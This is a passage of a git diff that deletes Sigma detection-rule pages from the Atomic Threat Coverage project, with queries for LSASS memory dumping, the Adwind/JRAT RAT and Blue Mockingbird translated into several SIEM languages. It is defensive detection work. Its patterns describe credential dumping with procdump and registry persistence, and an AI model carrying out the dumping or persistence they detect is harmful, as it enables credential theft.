-| **References**           | <ul><li>[https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html](https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html)</li><li>[https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html](https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html)</li><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.yaml)</li></ul>  |
-| **Author**               | E.M. Anhaus (orignally from Atomic Blue Detections, Tony Lambert), oscd.community |
-| Other Tags           | <ul><li>attack.t1003.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: LSASS Memory Dumping
-id: ffa6861c-4461-4f59-8a41-578c39f3f23e
-description: Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials. Identifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.
-status: experimental
-author: E.M. Anhaus (orignally from Atomic Blue Detections, Tony Lambert), oscd.community
-date: 2019/10/24
-modified: 2019/11/11
-references:
-    - https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html
-    - https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.yaml
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.t1003.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        CommandLine|contains|all:
-            - 'lsass'
-            - '.dmp'
-    selection2:
-        Image|endswith: '\werfault.exe'
-    selection3:
-        Image|contains: '\procdump'
-        Image|endswith: '.exe'
-        CommandLine|contains: 'lsass'
-    condition: selection1 and not selection2 or selection3
-fields:
-    - ComputerName
-    - User
-    - CommandLine
-falsepositives:
-    - Unlikely
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and ((($_.message -match "CommandLine.*.*lsass.*" -and $_.message -match "CommandLine.*.*.dmp.*") -and  -not ($_.message -match "Image.*.*\\werfault.exe")) -or ($_.message -match "Image.*.*\\procdump.*" -and $_.message -match "Image.*.*.exe" -and $_.message -match "CommandLine.*.*lsass.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(((winlog.event_data.CommandLine.keyword:*lsass* AND winlog.event_data.CommandLine.keyword:*.dmp*) AND (NOT (winlog.event_data.Image.keyword:*\\werfault.exe))) OR (winlog.event_data.Image.keyword:*\\procdump* AND winlog.event_data.Image.keyword:*.exe AND winlog.event_data.CommandLine.keyword:*lsass*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/ffa6861c-4461-4f59-8a41-578c39f3f23e <<EOF
-{
-  "metadata": {
-    "title": "LSASS Memory Dumping",
-    "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials. Identifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.t1003.001"
-    ],
-    "query": "(((winlog.event_data.CommandLine.keyword:*lsass* AND winlog.event_data.CommandLine.keyword:*.dmp*) AND (NOT (winlog.event_data.Image.keyword:*\\\\werfault.exe))) OR (winlog.event_data.Image.keyword:*\\\\procdump* AND winlog.event_data.Image.keyword:*.exe AND winlog.event_data.CommandLine.keyword:*lsass*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(((winlog.event_data.CommandLine.keyword:*lsass* AND winlog.event_data.CommandLine.keyword:*.dmp*) AND (NOT (winlog.event_data.Image.keyword:*\\\\werfault.exe))) OR (winlog.event_data.Image.keyword:*\\\\procdump* AND winlog.event_data.Image.keyword:*.exe AND winlog.event_data.CommandLine.keyword:*lsass*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'LSASS Memory Dumping'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n CommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(((CommandLine.keyword:*lsass* AND CommandLine.keyword:*.dmp*) AND (NOT (Image.keyword:*\\werfault.exe))) OR (Image.keyword:*\\procdump* AND Image.keyword:*.exe AND CommandLine.keyword:*lsass*))
-```
-
-
-### splunk
-    
-```
-(((CommandLine="*lsass*" CommandLine="*.dmp*") NOT (Image="*\\werfault.exe")) OR (Image="*\\procdump*" Image="*.exe" CommandLine="*lsass*")) | table ComputerName,User,CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (((CommandLine="*lsass*" CommandLine="*.dmp*")  -(Image="*\\werfault.exe")) OR (Image="*\\procdump*" Image="*.exe" CommandLine="*lsass*")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*(?:.*(?=.*.*lsass.*)(?=.*.*\.dmp.*)))(?=.*(?!.*(?:.*(?=.*.*\werfault\.exe)))))|.*(?:.*(?=.*.*\procdump.*)(?=.*.*\.exe)(?=.*.*lsass.*))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_mal_adwind.md b/Atomic_Threat_Coverage/Detection_Rules/win_mal_adwind.md
deleted file mode 100644
index 286d297..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_mal_adwind.md
+++ /dev/null
@@ -1,362 +0,0 @@
-| Title                    | Adwind RAT / JRAT       |
-|:-------------------------|:------------------|
-| **Description**          | Detects javaw.exe in AppData folder as used by Adwind / JRAT |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1064: Scripting](https://attack.mitre.org/techniques/T1064)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      |  There are no documented False Positives for this Detection Rule yet  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100](https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100)</li><li>[https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf](https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf)</li></ul>  |
-| **Author**               | Florian Roth, Tom Ueltschi |
-| Other Tags           | <ul><li>attack.t1059.005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-action: global
-title: Adwind RAT / JRAT
-id: 1fac1481-2dbc-48b2-9096-753c49b4ec71
-status: experimental
-description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
-references:
-    - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100
-    - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf
-author: Florian Roth, Tom Ueltschi
-date: 2017/11/10
-modified: 2018/12/11
-tags:
-    - attack.execution
-    - attack.t1064
-    - attack.t1059.005
-detection:
-    condition: selection
-level: high
----
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - '*\AppData\Roaming\Oracle*\java*.exe *'
-            - '*cscript.exe *Retrive*.vbs *'
----
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection:
-        EventID: 11
-        TargetFilename:
-            - '*\AppData\Roaming\Oracle\bin\java*.exe'
-            - '*\Retrive*.vbs'
----
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection:
-        EventID: 13
-        TargetObject: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run*
-        Details: '%AppData%\Roaming\Oracle\bin\\*'
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*\\AppData\\Roaming\\Oracle.*\\java.*.exe .*" -or $_.message -match "CommandLine.*.*cscript.exe .*Retrive.*.vbs .*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "11" -and ($_.message -match "TargetFilename.*.*\\AppData\\Roaming\\Oracle\\bin\\java.*.exe" -or $_.message -match "TargetFilename.*.*\\Retrive.*.vbs")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "13" -and $_.message -match "TargetObject.*HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run.*" -and $_.message -match "Details.*%AppData%\\Roaming\\Oracle\\bin\\.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\\AppData\\Roaming\\Oracle*\\java*.exe\ * OR *cscript.exe\ *Retrive*.vbs\ *)
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"11" AND winlog.event_data.TargetFilename.keyword:(*\\AppData\\Roaming\\Oracle\\bin\\java*.exe OR *\\Retrive*.vbs))
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"13" AND winlog.event_data.TargetObject.keyword:HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run* AND winlog.event_data.Details.keyword:%AppData%\\Roaming\\Oracle\\bin\\*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/1fac1481-2dbc-48b2-9096-753c49b4ec71 <<EOF
-{
-  "metadata": {
-    "title": "Adwind RAT / JRAT",
-    "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT",
-    "tags": [
-      "attack.execution",
-      "attack.t1064",
-      "attack.t1059.005"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*\\\\AppData\\\\Roaming\\\\Oracle*\\\\java*.exe\\ * OR *cscript.exe\\ *Retrive*.vbs\\ *)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\\\AppData\\\\Roaming\\\\Oracle*\\\\java*.exe\\ * OR *cscript.exe\\ *Retrive*.vbs\\ *)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Adwind RAT / JRAT'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/1fac1481-2dbc-48b2-9096-753c49b4ec71-2 <<EOF
-{
-  "metadata": {
-    "title": "Adwind RAT / JRAT",
-    "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT",
-    "tags": [
-      "attack.execution",
-      "attack.t1064",
-      "attack.t1059.005"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"11\" AND winlog.event_data.TargetFilename.keyword:(*\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java*.exe OR *\\\\Retrive*.vbs))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"11\" AND winlog.event_data.TargetFilename.keyword:(*\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java*.exe OR *\\\\Retrive*.vbs))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Adwind RAT / JRAT'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/1fac1481-2dbc-48b2-9096-753c49b4ec71-3 <<EOF
-{
-  "metadata": {
-    "title": "Adwind RAT / JRAT",
-    "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT",
-    "tags": [
-      "attack.execution",
-      "attack.t1064",
-      "attack.t1059.005"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"13\" AND winlog.event_data.TargetObject.keyword:HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run* AND winlog.event_data.Details.keyword:%AppData%\\\\Roaming\\\\Oracle\\\\bin\\\\*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"13\" AND winlog.event_data.TargetObject.keyword:HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run* AND winlog.event_data.Details.keyword:%AppData%\\\\Roaming\\\\Oracle\\\\bin\\\\*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Adwind RAT / JRAT'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(*\\AppData\\Roaming\\Oracle*\\java*.exe * *cscript.exe *Retrive*.vbs *)
-(EventID:"11" AND TargetFilename.keyword:(*\\AppData\\Roaming\\Oracle\\bin\\java*.exe *\\Retrive*.vbs))
-(EventID:"13" AND TargetObject.keyword:HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run* AND Details.keyword:%AppData%\\Roaming\\Oracle\\bin\\*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*\\AppData\\Roaming\\Oracle*\\java*.exe *" OR CommandLine="*cscript.exe *Retrive*.vbs *")
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="11" (TargetFilename="*\\AppData\\Roaming\\Oracle\\bin\\java*.exe" OR TargetFilename="*\\Retrive*.vbs"))
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="13" TargetObject="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run*" Details="%AppData%\\Roaming\\Oracle\\bin\\*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*\\AppData\\Roaming\\Oracle*\\java*.exe *", "*cscript.exe *Retrive*.vbs *"])
-(event_id="11" TargetFilename IN ["*\\AppData\\Roaming\\Oracle\\bin\\java*.exe", "*\\Retrive*.vbs"])
-(event_id="13" TargetObject="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run*" Details="%AppData%\\Roaming\\Oracle\\bin\\*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*\AppData\Roaming\Oracle.*\java.*\.exe .*|.*.*cscript\.exe .*Retrive.*\.vbs .*)'
-grep -P '^(?:.*(?=.*11)(?=.*(?:.*.*\AppData\Roaming\Oracle\bin\java.*\.exe|.*.*\Retrive.*\.vbs)))'
-grep -P '^(?:.*(?=.*13)(?=.*HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.*)(?=.*%AppData%\Roaming\Oracle\bin\\.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_mal_blue_mockingbird.md b/Atomic_Threat_Coverage/Detection_Rules/win_mal_blue_mockingbird.md
deleted file mode 100644
index 83afbf3..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_mal_blue_mockingbird.md
+++ /dev/null
@@ -1,361 +0,0 @@
-| Title                    | Blue Mockingbird       |
-|:-------------------------|:------------------|
-| **Description**          | Attempts to detect system changes made by Blue Mockingbird |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1112: Modify Registry](https://attack.mitre.org/techniques/T1112)</li><li>[T1047: Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1112: Modify Registry](../Triggers/T1112.md)</li><li>[T1047: Windows Management Instrumentation](../Triggers/T1047.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://redcanary.com/blog/blue-mockingbird-cryptominer/](https://redcanary.com/blog/blue-mockingbird-cryptominer/)</li></ul>  |
-| **Author**               | Trent Liffick (@tliffick) |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-action: global
-title: Blue Mockingbird
-id: c3198a27-23a0-4c2c-af19-e5328d49680e
-status: experimental
-description: Attempts to detect system changes made by Blue Mockingbird
-references:
-    - https://redcanary.com/blog/blue-mockingbird-cryptominer/
-tags:
-    - attack.execution
-    - attack.t1112
-    - attack.t1047
-author: Trent Liffick (@tliffick)
-date: 2020/05/14
-falsepositives:
-    - unknown
-level: high
-detection:
-    condition: 1 of them
----
-logsource:
-    category: process_creation
-    product: windows
-detection:
-  exec_selection:
-    Image|endswith: '\cmd.exe'
-    CommandLine|contains|all:
-      - 'sc config'
-      - 'wercplsupporte.dll'
----
-logsource:
-  category: process_creation
-  product: windows
-detection:
-  wmic_cmd:
-    Image|endswith: '\wmic.exe'
-    CommandLine|endswith: 'COR_PROFILER'
----
-logsource:
-  product: windows
-  service: sysmon
-detection:
-  mod_reg:
-    EventID: 13
-    TargetObject|endswith:
-      - '\CurrentControlSet\Services\wercplsupport\Parameters\ServiceDll'
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\cmd.exe" -and $_.message -match "CommandLine.*.*sc config.*" -and $_.message -match "CommandLine.*.*wercplsupporte.dll.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\wmic.exe" -and $_.message -match "CommandLine.*.*COR_PROFILER") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "13" -and ($_.message -match "TargetObject.*.*\\CurrentControlSet\\Services\\wercplsupport\\Parameters\\ServiceDll")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\cmd.exe AND winlog.event_data.CommandLine.keyword:*sc\ config* AND winlog.event_data.CommandLine.keyword:*wercplsupporte.dll*)
-(winlog.event_data.Image.keyword:*\\wmic.exe AND winlog.event_data.CommandLine.keyword:*COR_PROFILER)
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"13" AND winlog.event_data.TargetObject.keyword:(*\\CurrentControlSet\\Services\\wercplsupport\\Parameters\\ServiceDll))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/c3198a27-23a0-4c2c-af19-e5328d49680e <<EOF
-{
-  "metadata": {
-    "title": "Blue Mockingbird",
-    "description": "Attempts to detect system changes made by Blue Mockingbird",
-    "tags": [
-      "attack.execution",
-      "attack.t1112",
-      "attack.t1047"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\cmd.exe AND winlog.event_data.CommandLine.keyword:*sc\\ config* AND winlog.event_data.CommandLine.keyword:*wercplsupporte.dll*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\cmd.exe AND winlog.event_data.CommandLine.keyword:*sc\\ config* AND winlog.event_data.CommandLine.keyword:*wercplsupporte.dll*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Blue Mockingbird'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/c3198a27-23a0-4c2c-af19-e5328d49680e-2 <<EOF
-{
-  "metadata": {
-    "title": "Blue Mockingbird",
-    "description": "Attempts to detect system changes made by Blue Mockingbird",
-    "tags": [
-      "attack.execution",
-      "attack.t1112",
-      "attack.t1047"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\wmic.exe AND winlog.event_data.CommandLine.keyword:*COR_PROFILER)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\wmic.exe AND winlog.event_data.CommandLine.keyword:*COR_PROFILER)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Blue Mockingbird'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/c3198a27-23a0-4c2c-af19-e5328d49680e-3 <<EOF
-{
-  "metadata": {
-    "title": "Blue Mockingbird",
-    "description": "Attempts to detect system changes made by Blue Mockingbird",
-    "tags": [
-      "attack.execution",
-      "attack.t1112",
-      "attack.t1047"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"13\" AND winlog.event_data.TargetObject.keyword:(*\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"13\" AND winlog.event_data.TargetObject.keyword:(*\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Blue Mockingbird'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\cmd.exe AND CommandLine.keyword:*sc config* AND CommandLine.keyword:*wercplsupporte.dll*)
-(Image.keyword:*\\wmic.exe AND CommandLine.keyword:*COR_PROFILER)
-(EventID:"13" AND TargetObject.keyword:(*\\CurrentControlSet\\Services\\wercplsupport\\Parameters\\ServiceDll))
-```
-
-
-### splunk
-    
-```
-(Image="*\\cmd.exe" CommandLine="*sc config*" CommandLine="*wercplsupporte.dll*")
-(Image="*\\wmic.exe" CommandLine="*COR_PROFILER")
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="13" (TargetObject="*\\CurrentControlSet\\Services\\wercplsupport\\Parameters\\ServiceDll"))
-```
-
-
-### logpoint
-    
-```
